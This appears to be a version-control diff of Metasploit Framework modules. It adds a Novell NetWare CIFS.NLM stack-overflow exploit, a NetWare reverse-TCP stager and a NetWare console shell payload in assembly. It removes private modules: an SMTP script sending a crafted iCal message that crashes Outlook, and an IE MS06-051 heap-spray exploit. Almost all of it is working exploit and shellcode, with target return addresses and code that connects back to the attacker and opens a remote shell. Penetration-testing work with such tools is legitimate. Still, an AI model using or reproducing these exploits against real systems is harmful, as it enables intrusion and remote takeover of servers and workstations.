def serverprotect_writefile(handle, buf)
data = "\0" * 4104
data[0, 4] = [handle].pack('V')
data[4, buf.length] = buf
data[4100, 4] = [buf.length].pack('V')
resp = serverprotect_rpccmd(131076, data, 4104)
return if not resp
if (resp.length != 4112)
print_status("An unknown error occurred while calling WriteFile.")
return 0
else
ret, = resp[4108,4].unpack('V')
if ret != 0
print_status("An error occured while calling WriteFile: #{ret}.")
return 0
end
end
return 1
end
def serverprotect_closehandle(handle)
data = [handle].pack('V')
resp = serverprotect_rpccmd(131074, data, 4)
return if not resp
if (resp.length != 12)
print_status("An unknown error occurred while calling CloseHandle.")
else
ret, = resp[8,4].unpack('V')
if ret != 0
print_status("An error occured while calling CloseHandle: #{ret}.")
end
end
end
def serverprotect_rpccmd(cmd, data, osize)
if (data.length.remainder(4) != 0)
padding = "\0" * (4 - (data.length.remainder(4)))
else
padding = ""
end
stub =
NDR.long(cmd) +
NDR.long(data.length) +
data +
padding +
NDR.long(data.length) +
NDR.long(osize)
return serverprotect_rpc_call(0, stub)
end
#
# Call the serverprotect RPC service
#
def serverprotect_rpc_call(opnum, data = '')
begin
connect
handle = dcerpc_handle(
'25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0',
'ncacn_ip_tcp', [datastore['RPORT']]
)
dcerpc_bind(handle)
resp = dcerpc.call(opnum, data)
outp = ''
if (dcerpc.last_response and dcerpc.last_response.stub_data)
outp = dcerpc.last_response.stub_data
end
disconnect
outp
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Error: #{e}")
nil
end
end
end
end

129
modules/exploits/netware/smb/lsass_cifs.rb Normal file
View File

@ -0,0 +1,129 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Netware::Smb::LsassCifs < Msf::Exploit::Remote
include Exploit::Remote::DCERPC
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in the NetWare CIFS.NLM driver.
Since the driver runs in the kernel space, a failed exploit attempt can
cause the OS to reboot.
},
'Author' =>
[
'toto',
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
],
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
},
'Platform' => 'netware',
'Targets' =>
[
# NetWare SP can be found in the SNMP version :
# 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)
[ 'VMware', { 'Ret' => 0x000f142b } ],
[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
],
'DisclosureDate' => 'Jan 21 2007'))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (LSARPC)", 'lsarpc'])
], self.class)
end
def exploit
# Force multi-bind off (netware doesn't support it)
datastore['DCERPC::fake_bind_multi'] = false
connect()
smb_login()
handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stb =
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0x000f0fff)
resp = dcerpc.call(0x2c, stb)
handle, = resp[0,20]
code, = resp[20, 4].unpack('V')
name =
rand_text_alphanumeric(0xa0) +
[target.ret].pack('V') +
payload.encoded
stb =
handle +
NDR.long(1) +
NDR.long(1) +
NDR.short(name.length) +
NDR.short(name.length) +
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingStringPreBuilt(name) +
NDR.long(0) +
NDR.long(0) +
NDR.long(1) +
NDR.long(0)
print_status("Calling the vulnerable function ...")
begin
dcerpc.call(0x0E, stb)
rescue => e
end
# Cleanup
handler
disconnect
end
end
end

1
modules/exploits/private/README.txt
View File

@ -1 +0,0 @@
Modules in this directory are not accessible to read-only SVN users.

133
modules/exploits/private/killahbee_outlook.r_b
View File

@ -1,133 +0,0 @@
#!/usr/bin/env ruby
#
# Important section:
#
# BEGIN:VEVENT
# DTSTAMP:20060509T194627Z
# DTSTART;TZID:20060509T150000
# END:VEVENT
#
# the DTSTART;TZID line requires the following form to be valid:
# DTSTART;TZID="timezone info goes here":<time>
#
# without the ="" it'll produce a read error in mimedir.dll @ 354dc00d
# mov eax, [eax + ecx + 0x8] <-- we control ecx
#
# Probably other possible crashes - still working.
#
# ~ Puss
#
$:.unshift('~/src/framework3/trunk/lib')
require 'rex'
s = Rex::Socket.create_tcp(
'PeerHost' => '10.4.10.190',
'PeerPort' => 25
)
puts s.get_once
s.write("EHLO X\r\n")
puts s.get_once
s.write("MAIL FROM: bar@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("RCPT TO: foo@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("DATA\r\n")
puts s.get_once
bsize = 32768
x =
%Q[ From: bar@EXCHNG.sfeng.sourcefire.com
To: foo@EXCHNG.sfeng.sourcefire.com
Subject: iCal Exploit
Content-class: urn:content-classes:calendarmessage
MIME-Version: 1.0
Content-Type: multipart/alternative;boundary="01BD3665.3AF0D360"
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
--01BD3665.3AF0D360
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: base64
VHlwZTpTaW5nbGUgTWVldGluZw0KT3JnYW5pemVyOkhEIE1vb3JlDQpTdGFydCBUaW1lOlR1ZXNk
YXksIE1heSAwOSwgMjAwNiAzOjAwIFBNDQpFbmQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYg
MzozMCBQTQ0KVGltZSBab25lOihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEp
DQpMb2NhdGlvbjpib2FyZCByb29tDQoNCip+Kn4qfip+Kn4qfip+Kn4qfioNCg0KDQpUaGlzIGlz
IGEgdGVzdA0KDQpNaWNyb3NvZnQgT3V0bG9vayBXZWIgQWNjZXNzOg0KaHR0cDovL01BSUwvRXhj
aGFuZ2UvaGRtb29yZS9JbmJveC90ZXN0LTIuRU1MP2NtZD1vcGVuDQoNCg==
--01BD3665.3AF0D360
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMi8vRU4iPg0KPEhUTUw+
DQo8SEVBRD4NCjxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQtVHlwZSIgQ09OVEVOVD0idGV4dC9o
dG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjxNRVRBIE5BTUU9IkdlbmVyYXRvciIgQ09OVEVOVD0iTVMg
RXhjaGFuZ2UgU2VydmVyIHZlcnNpb24gNi41LjcyMjYuMCI+DQo8VElUTEU+dGVzdDwvVElUTEU+
DQo8L0hFQUQ+DQo8Qk9EWT4NCjwhLS0gQ29udmVydGVkIGZyb20gdGV4dC9wbGFpbiBmb3JtYXQg
LS0+DQoNCjxQPjxGT05UIFNJWkU9Mj5UeXBlOlNpbmdsZSBNZWV0aW5nPEJSPg0KT3JnYW5pemVy
OkhEIE1vb3JlPEJSPg0KU3RhcnQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYgMzowMCBQTTxC
Uj4NCkVuZCBUaW1lOlR1ZXNkYXksIE1heSAwOSwgMjAwNiAzOjMwIFBNPEJSPg0KVGltZSBab25l
OihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJmFtcDsgQ2FuYWRhKTxCUj4NCkxvY2F0aW9u
OmJvYXJkIHJvb208QlI+DQo8QlI+DQoqfip+Kn4qfip+Kn4qfip+Kn4qPEJSPg0KPEJSPg0KPEJS
Pg0KVGhpcyBpcyBhIHRlc3Q8QlI+DQo8L0ZPTlQ+DQo8L1A+DQo8UD5NaWNyb3NvZnQgT3V0bG9v
ayBXZWIgQWNjZXNzOiA8QSBIUkVGPSJodHRwOi8vTUFJTC9FeGNoYW5nZS9oZG1vb3JlL0luYm94
L3Rlc3QtMi5FTUw/Y21kPW9wZW4iPmh0dHA6Ly9NQUlML0V4Y2hhbmdlL2hkbW9vcmUvSW5ib3gv
dGVzdC0yLkVNTD9jbWQ9b3BlbjwvQT48L1A+DQo8L0JPRFk+DQo8L0hUTUw+
--01BD3665.3AF0D360
Content-class: urn:content-classes:calendarmessage
Content-Type: text/calendar; method=REQUEST; name="meeting.ics"
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:Microsoft CDO for Microsoft Exchange
VERSION:2.0
BEGIN:VTIMEZONE
TZID:(GMT-06.00) Central Time (US & Canada)
X-MICROSOFT-CDO-TZID:11
BEGIN:STANDARD
DTSTART:16010101T020000
TZOFFSETFROM:-0500
TZOFFSETTO:-0600
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=10;BYDAY=-1SU
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:16010101T020000
TZOFFSETFROM:-0600
TZOFFSETTO:-0500
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=4;BYDAY=1SU
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20060509T194627Z
DTSTART;TZID:20060509T150000
END:VEVENT
END:VCALENDAR
--01BD3665.3AF0D360
]
x.each_line do |line|
line.strip!
s.write(line + "\r\n")
end
s.write(".\r\n")
puts s.get_once
s.write("QUIT\r\n")
puts s.get_once

203
modules/exploits/private/ms06_051_unexceptfilter.rb
View File

@ -1,203 +0,0 @@
##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Private::IeUnexpFilt < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'MS06-051 Unhandled Exception Filter Hijack',
'Description' => %q{
This module exploits a design error in the way that the unhandled
exception filter chain is managed. By loading and unloading DLLs
that register UEFs in the proper order, it is possible to cause
the top-level unhandled exception filter to point to an invalid
memory address. Using heap spraying techniques, it is possible
to place attacker controlled code at the location that the top-level
unhandled exception filter points. Generating an unhandled
exception then leads to code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'skape',
],
'Version' => '$Revision$',
'References' =>
[
# 0day
],
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0
},
'Targets' =>
[
# Target 0: Automatic
[
'Windows NT/2000/XP/2003 Automatic',
{
'Platform' => 'win',
},
],
],
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
p = payload
# Re-generate the payload
return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)
hex = p.encoded.unpack('H*')[0]
content =
"<html><script language='javascript'>
var w1;
var w2;
function win1()
{
// GBDetect is small, so we have to take steps to make sure
// that the heap grows into the region. Therefore, we need
// to load DLLs that will be loaded at lower addresses.
// This series works reliably, but relies on vmware:
//new ActiveXObject('vmappcfg.ProjWz.9');
//new ActiveXObject('GBDetect.Detect');
//new ActiveXObject('vmhwcfg.Hwz.9');
// This series works reliably
//new ActiveXObject('OPUCatalog.OPUCatalog11'); // office
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
//new ActiveXObject('NvCpl.NvCplLateBound'); // nvidia
//new ActiveXObject('BarControl.GDSControl'); // realplayer
// works all by itself, just need to spray better
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
// these may be useful...
//new ActiveXObject('CDDBRealControl.CDDBControl');//realplayer
//new ActiveXObject('CEnroll.CEnroll');
// These overlap on XPSP2, not on XPSP0. msado15 is larger
new ActiveXObject('RDS.DataControl'); // msadco
new ActiveXObject('ADODB.Record'); // msado15
// Acrobat OCX
new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
window.opener.open2();
}
function win2()
{
// Some random real player activex control that sets an unhandled
// exception filter indirectly through another DLL.
//new ActiveXObject('IERJCtl.IERJCtl');
// Even though an object instance isn't created as a result of this,
// the DLL associated with this COM object is still loaded, causing
// it to register its UEF.
try
{
new ActiveXObject('CompatUI.Util');
} catch(err)
{
}
window.opener.go();
}
function crash()
{
var sp1 = spray(0);
// IE crash bug #134234
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
}
function spray(length)
{
var payloadHex = \"#{hex}\";
var payload = unescape(payloadHex.replace(/([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})/g, \"%u$2$1\"));
CollectGarbage();
var spray = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');
if (length == 0)
length = 0x4000000;
do
{
if (spray.length >= 0x10000)
spray += payload;
spray += spray;
} while (spray.length < length);
spray += payload;
}
function close2()
{
w2.close();
setTimeout('crash();', 1000);
}
function close1()
{
w1.close();
setTimeout('close2();', 1000);
}
function go()
{
setTimeout('close1();', 1000);
}
function open2()
{
w2 = window.open('#{request.resource}?window=1', 'win2');
}
if (window.opener == null)
{
spray(0x100000);
w1 = window.open('#{request.resource}?window=1', 'win1');
}
else
{
if (window.name == 'win1')
win1();
else
win2();
}
</script></html>";
# Transmit the response to the client
send_response_html(cli, content)
end
end
end

212
modules/payloads/stagers/netware/reverse_tcp.rb Normal file
View File

@ -0,0 +1,212 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'metasm'
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
module Msf
module Payloads
module Stagers
module Netware
module ReverseTcp
include Msf::Payload::Stager
include Msf::Payload::Netware
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Version' => '$Revision$',
'Description' => 'Connect back to the attacker',
'Author' => 'toto',
'License' => MSF_LICENSE,
'Platform' => 'netware',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockesi',
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 0, 'ADDR' ],
'LPORT' => [ 0, 'n' ],
},
'Assembly' => <<EOS
jmp main_code
;;;
; resolve a symbol address using the DebuggerSymbolHashTable
; (could resolve only against function name for smaller code)
;;;
resolv_addr:
push edi
push ecx
xor edi, edi
r_loop:
mov edx, [ebp+edi*4]
test edx, edx
jz r_next
r_loop2:
xor esi, esi
mov ebx, [edx+8]
mov al, byte ptr[ebx]
r_iloop2:
test al, al
jz r_after2
inc ebx
movzx ecx, byte ptr[ebx]
ror esi, 0x0d
add esi, ecx
dec al
jmp r_iloop2
r_after2:
cmp esi, [esp+0x0c]
jz r_found
mov edx, [edx]
test edx, edx
jnz r_loop2
r_next:
inc edi
cmp edi, 0x200
jnz r_loop
jmp r_end
r_found:
mov eax, [edx+4]
r_end:
pop ecx
pop edi
ret
main_code:
; search DebuggerSymbolHashTable pointer
cli
mov ebp, 0x300000 ; SERVER.NLM code
f_finddebugger:
cmp dword ptr[ebp], 0x8110eac1
jnz f_next
cmp dword ptr[ebp+4], 0x0001ffe2
jz f_end
f_next:
inc ebp
jmp f_finddebugger
f_end:
mov ebp, [ebp+0xc]
; resolve function pointers
call current
current:
pop edi
add edi, (fct_ptrs - current)
mov cl, 6
resolv_ptrs:
push [edi]
call resolv_addr
stosd
dec cl
test cl, cl
jnz resolv_ptrs
sti
; remove CIFS lock
call [edi-4] ; NSS.NLM|NSSMPK_UnlockNss
; allocate heap buffer to remove the code from the stack (if on the stack)
; network functions will give back control to the kernel and we don't want
; the driver to erase our shellcode
push 65535
call [edi-8] ; AFPTCP.NLM|LB_malloc
mov ecx, (end_reverse - reverse_connect)
mov esi, edi
sub esi, ecx
mov edi, eax
test eax, eax
jz end
repe movsb
jmp eax
reverse_connect:
xor ebx, ebx
push ebp
mov ebp, esp
push ebp
push ebx ; protocol
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call [edi-0xc] ; LIBC.NLM|bsd_socket_mp
mov esi, eax
test eax, eax
jz end
push ebx
push ebx
push LHOST
push.i16 LPORT
push.i16 2
mov ecx, esp
push ebp
push 16
push ecx
push esi
call [edi-0x10] ; LIBC.NLM|bsd_connect_mp
cmp eax, -1
jz end
push 65535
push edi
mov ecx, esp
push ebx
push ebx
push ebx
inc ebx
push ebx
dec ebx
push ecx
push ebx
push ebx
mov ecx, esp
push ebp
push ebx
push ecx
push esi
call [edi-0x14] ; LIBC.NLM|bsd_recvmsg_mp
jmp edi
end:
; go back to the main kernel loop
call [edi-0x18] ; SERVER.NLM|kWorkerThread
fct_ptrs:
dd 0x9294bdcb ; SERVER.NLM|kWorkerThread
dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp
dd 0x19a75280 ; LIBC.NLM|bsd_connect_mp
dd 0x46f23d88 ; LIBC.NLM|bsd_socket_mp
dd 0x6877687c ; AFPTCP.NLM|LB_malloc
dd 0x8967f0ce ; NSS.NLM|NSSMPK_UnlockNss
end_reverse:
nop
EOS
}
))
end
end
end end end end

471
modules/payloads/stages/netware/shell.rb Normal file
View File

@ -0,0 +1,471 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'metasm'
require 'msf/core'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Stages
module Netware
module NetwareConsole
def initialize(info = {})
super(merge_info(info,
'Name' => 'NetWare Command Shell',
'Version' => '$Revision$',
'Description' => 'Connect to the NetWare console',
'Author' => 'toto',
'License' => MSF_LICENSE,
'Platform' => 'netware',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockesi'
},
'Stage' =>
{
'Offsets' =>
{
#'EXITFUNC' => [ 443, 'V' ]
},
'Assembly' => <<EOS
jmp main_code
;;;
; resolve a symbol address using the DebuggerSymbolHashTable
; (could resolve only against function name for smaller code)
;;;
resolv_addr:
push edi
push ecx
xor edi, edi
r_loop:
mov edx, [ebp+edi*4]
test edx, edx
jz r_next
r_loop2:
xor esi, esi
mov ebx, [edx+8]
mov al, byte ptr[ebx]
r_iloop2:
test al, al
jz r_after2
inc ebx
movzx ecx, byte ptr[ebx]
ror esi, 0x0d
add esi, ecx
dec al
jmp r_iloop2
r_after2:
cmp esi, [esp+0x0c]
jz r_found
mov edx, [edx]
test edx, edx
jnz r_loop2
r_next:
inc edi
cmp edi, 0x200
jnz r_loop
jmp r_end
r_found:
mov eax, [edx+4]
r_end:
pop ecx
pop edi
ret
main_code:
; save socket identifier
call main_next
main_next:
pop edi
add edi, (socket_ptr - main_next)
mov eax, esi
stosd
; search DebuggerSymbolHashTable pointer
cli
mov ebp, 0x300000 ; SERVER.NLM code
f_finddebugger:
cmp dword ptr[ebp], 0x8110eac1
jnz f_next
cmp dword ptr[ebp+4], 0x0001ffe2
jz f_end
f_next:
inc ebp
jmp f_finddebugger
f_end:
mov ebp, [ebp+0xc]
; resolve function pointers
mov cl, 15
resolv_ptrs:
push [edi]
call resolv_addr
stosd
dec cl
test cl, cl
jnz resolv_ptrs
sti
; all screens have the same size
push edi
lea esi, [edi+4]
push esi
call [edi-0x18] ; SERVER.NLM|GetScreenSize
; allocate 2 buffer for the main screen and the backup
xor eax, eax
xor ebx, ebx
mov ax, word ptr[edi]
mov bx, word ptr[esi]
imul eax, ebx
mov [edi+8], eax
push eax
call [edi-8] ; AFPTCP.NLM|LB_malloc
mov [edi+0xc], eax
call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen
mov [edi+0x10], eax
sub esp, 4
mov ebp, esp ; n
recv_loop:
xor ebx, ebx
inc ebx
push 200000 ; tv_usec
push 0 ; tv_sec (0)
mov edx, esp ; timeout
sub esp, 4
mov ecx, esp ; rescode
push 1 ; num socket (1)
push ecx ; &rescode
push edx ; &timeout
push 0 ; NULL
push 0 ; NULL
push 0 ; NULL
push [edi-0x40] ; socket
call [edi-0x2C] ; LIBC.NLM|bsd_select_mp
add esp, 0x28
test eax, eax
jnz end
call update_screen
sub esp, 4
mov edx, esp
push edx ; &rescode
push ebp ; &n
push ebx ; FIONREAD
push [edi-0x40] ; socket
call [edi-0x38] ; LIBC.NLM|_ioctlsocket
add esp, 0x14
test eax, eax
jnz end
cmp [ebp], 0
jz recv_loop
; check we are not longer than the key buffer size
cmp [ebp], 32
jbe recvd
mov [ebp], 32
recvd:
lea eax, [edi+0x20]
push [ebp]
push eax
call recv_data
add esp, 8
mov ebx, [ebp]
lea esi, [edi+0x20]
mov byte ptr[esi+ebx], 0
; push 0x00FFFEFF
; mov eax, esp
; push eax
; push [edi+0x10] ; screen
; call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen
; add esp, 0x0c
send_input:
movzx eax, byte ptr[esi]
test eax, eax
jz send_end
cmp al, 0x0a
jz send_enter
; we need to inject the command in the console input
push 0x00
push 0x00 ; should be the keycode in fact
push eax ; key value
push 0x0
push [edi+0x10] ; screen
call [edi-0x20] ; SERVER.NLM|AddKey
jmp send_next
send_enter:
; send special code for enter
push 0x1c
push 0x00
push 0x00
push 0x02
push [edi+0x10] ; screen
call [edi-0x20] ; SERVER.NLM|AddKey
push 0x00FFFEFF
mov eax, esp
push eax
push [edi+0x10] ; screen
call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen
add esp, 0x0c
send_next:
add esp, 0x14
inc esi
jmp send_input
send_end:
jmp recv_loop
end:
sub esp, 4
mov ebp, esp ; rescode
push ebp ; rescode
push 2 ; SHUT_RDWR
push [edi-0x40] ; socket
call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp
push ebp ; rescode
push [edi-0x40] ; socket
call [edi-0x34] ; LIBC.NLM|bsd_close_mp
; go back to the main kernel loop
call [edi-0x0C] ; SERVER.NLM|kWorkerThread
update_screen:
pushad
push [edi+0x0c]
push 0
push [edi+0x08]
push 0
push [edi+0x10]
call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer
add esp, 0x14
mov edx, [edi+0x0c]
xor ebx, ebx
xor esi, esi
xor ebp, ebp
checksum:
cmp ebx, [edi+4]
jz end_checksum
xor ecx, ecx
check_line:
cmp ecx, [edi]
jz next_line
mov al, byte ptr[edx]
ror esi, 0x0d
add esi, eax
cmp [edx], 0x20FFFEFF
jnz check_line2
mov ebp, ebx
inc ebp
check_line2:
inc edx
inc ecx
jmp check_line
next_line:
inc ebx
jmp checksum
end_checksum:
cmp esi, [edi+0x14]
jnz new_checksum
cmp [edi+0x18], 1
jz end_update
mov [edi+0x18], 1
push ebp
call send_screen
add esp, 4
jmp end_update
new_checksum:
mov [edi+0x14], esi
mov [edi+0x18], 0
end_update:
popad
ret
send_screen:
push ebx
sub esp, 4
mov esi, esp
push esi
lea eax, [esi+2]
push eax
push [edi+0x10]
call [edi-0x10] ; SERVER.NLM|GetInputCursorPosition
add esp, 0x0c
mov ebx, [esp+0x0c]
xor edx, edx
mov ecx, [edi+0x0c]
mov eax, dword ptr[edi]
imul eax, ebx
add ecx, eax
send_loop:
cmp bx, word ptr[esi+2]
jae last_line
mov dx, word ptr[edi]
jmp next_send
last_line:
mov dx, word ptr[esi]
next_send:
push edx
push ecx
call send_data
add esp, 0x08
cmp bx, word ptr[esi+2]
jae end_sl
push 0x0000000a
mov eax, esp
push 1
push eax
call send_data
add esp, 0x0C
inc ebx
add ecx, edx
cmp bx, word ptr[esi+2]
jbe send_loop
end_sl:
pop ebx
pop ebx
ret
send_data:
push [esp+8]
push [esp+8]
push [edi-0x40]
push [edi-0x24]
call sendrecv_data
add esp, 0x10
ret
recv_data:
push [esp+8]
push [esp+8]
push [edi-0x40]
push [edi-0x28]
call sendrecv_data
add esp, 0x10
ret
sendrecv_data:
push ebp
push ecx
push ebx
push edx
mov ebp, esp
push [ebp+0x20] ; iov_len
push [ebp+0x1C] ; iov_base
mov ecx, esp ; msg_iov
xor ebx, ebx ; struct msghdr
push ebx ; msg_flags
push ebx ; msg_controllen
push ebx ; msg_control
inc ebx
push ebx ; msg_iovlen (1 array)
dec ebx
push ecx ; msg_iov
push ebx ; msg_namelen
push ebx ; msg_name
mov ecx, esp ; message
sub esp, 4
mov edx, esp ; rescode
push edx ; rescode
push 0 ; flags
push ecx ; message
push [ebp+0x18] ; socket
call [ebp+0x14] ; SERVER.NLM|bsd_recvmsg_mp
mov esp, ebp
pop edx
pop ebx
pop ecx
pop ebp
ret
socket_ptr:
dd 0
fct_ptrs:
dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen
dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket
dd 0x4907702d ; LIBC.NLM|bsd_close_mp
dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp
dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp
dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp
dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp
dd 0xe98bfec3 ; SERVER.NLM|AddKey
dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer
dd 0x898d560c ; SERVER.NLM|GetScreenSize
dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen
dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition
dd 0x9294bdcb ; SERVER.NLM|kWorkerThread
dd 0x6877687c ; AFPTCP.NLM|LB_malloc
dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free
screen_info:
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0 ; screen checksum
dd 0 ; screen state
end_reverse:
nop
EOS
}
))
end
end
end end end end